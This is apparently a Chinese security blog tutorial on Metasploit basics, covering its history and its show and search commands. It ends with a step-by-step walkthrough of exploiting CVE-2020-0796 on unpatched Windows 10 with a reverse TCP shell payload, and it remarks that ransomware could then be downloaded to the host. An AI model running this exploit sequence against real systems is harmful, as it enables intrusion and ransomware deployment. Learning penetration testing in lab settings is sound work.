网络安全从业人员必会的metasploit渗透测试框架

点击兰花豆说网络安全，了解更多网络安全知识

一、Metasploit简介

Metasploit和Cobalt Strike是两款著名的渗透测试框架，作为网络安全从业人员，有必要做些基本了解和功能的使用，未知攻，焉知防，从攻防对抗的角度去深度理解网络安全问题，首先做好网络安全基础防护，再逐步过渡到高阶对抗。

Metasploit主要是用来利用和验证漏洞，包括社区版和专业版本（可以试用30天，企业邮箱申请），由ruby语言开发为主，官方网站（www.metasploit.com）可以下载，支持Linux、MacOS、windows系统，由H.D.Moore在2003年发布。从此，似乎人人都可以成为黑客了，Metasploit团队一直在开发各种攻击工具。2009年底，Rapid7公司收购metasploit团队，H.D.Moore也加入Rapid7，metasploit迈上一个新台阶。本文简单介绍一下这个框架。

专业版和社区版的功能对比，其实社区版的功能偏少，但是开源的，可以自己增加或修改功能。但是功能足以让从业人员了解渗透基本知识。如下图所示：

二、Metasploit使用方法

1.如何进入msf

一般kali liuix自带Metasploit社区版，通过虚拟机（vmware workstation）安装kali linux（官网www.kali.org下载），做渗透测试建议配置不低于32G内存的PC或服务器。kali安装（建议做好快照）之后打开终端命令行，输入msfdb run就进入metasploit框架，基于postgresql数据库。如下图所示：

输入help，可以查看帮助。

2.常用命令介绍

2.1 connect命令

connect 192.168.6.128 5003，连接本地的资产灯塔ARL，提交get请求，可以查看到服务器的版本号。

2.2 show命令

show -h帮助命令

show exploits 查看攻击模块exp。

show payloads 查看攻击载荷。

show auxiliary 查看辅助攻击载荷。

2.3 search命令

search -h 帮助命令。

search xxx 根据关键字查询search oracle，查询所有与oracle相关的，内容很多。

search name:xxx 根据名称查询search name:oracle，查询名字为oracle的。

search path:xxx 根据路径查询search path:oracle，查看路径中包含oracle的。

search platform:xxx 根据平台查询 search platform:oracle，查看影响此平台的模块。

search type:xxx 根据模块类型查找search type:exploit，查看exp模块。包括这些模块(exploit, payload, auxiliary, encoder, evasion, post, or nop)，可以通过search -h帮助命令查看。

search name:xxx type:xxx 多参数联合查找search name:oracle type:exploit，查看类型和名称。

三、msf实战永恒之黑

1.search cve: CVE-2020-0796 type:exploit 查询一下永恒之黑的exp。

2.use 1 加载模块

show options 查看配置项，可以查看该漏洞影响的版本，win10 v1903-1909 x64。还可以查看对应的payload。

set lhost 设置本机IP，lport默认即可。

3.search windows/x64/shell type:payload 找一个好用的payload，并设置set payload windows/x64/shell/reverse_tcp

4.show options查看配置信息

通过set rhosts设置被攻击主机IP，设置完成之后，set defangedmode false，输入exploit，成功进入win10主机，可以通过相关服务下载勒索病毒到win10中。

5.win10永恒之黑存在条件

445端口开启，共享开启。系统版本Windows10 v1903-1909 x64，没有打KB4551762补丁。

查看win10版本和补丁方式

“设置-系统-关于”中查看版本号是否满足要求。

查看补丁systeminfo

查看共享功能是否打开

四、总结

学习Metasploit框架对网络安全从业人员，尤其是售前、售后、产品经理和研发人员来说，具有重要意义。通过掌握这一强大的渗透测试工具，这些专业人员可以深入了解各种渗透攻击的原理和方法，从攻击者的视角审视网络安全问题。这种视角有助于更全面地认识自身产品的潜在安全漏洞，并设计出更加安全的系统架构和防护机制。售前人员可以利用Metasploit演示实际攻击场景，增强客户对安全产品的信任；售后人员则能够迅速复现和分析客户遇到的安全问题，提供高效的解决方案；产品经理可以基于实际攻击手段，制定更具针对性的安全策略和功能需求；研发人员通过实战练习，不仅提高了漏洞利用和修复的技能，还能在开发过程中提前预防安全漏洞的产生。总体而言，学习和掌握Metasploit框架，能够使网络安全从业人员更好地理解和应对现实中的网络威胁，从而提升整个团队的安全防护能力和产品质量。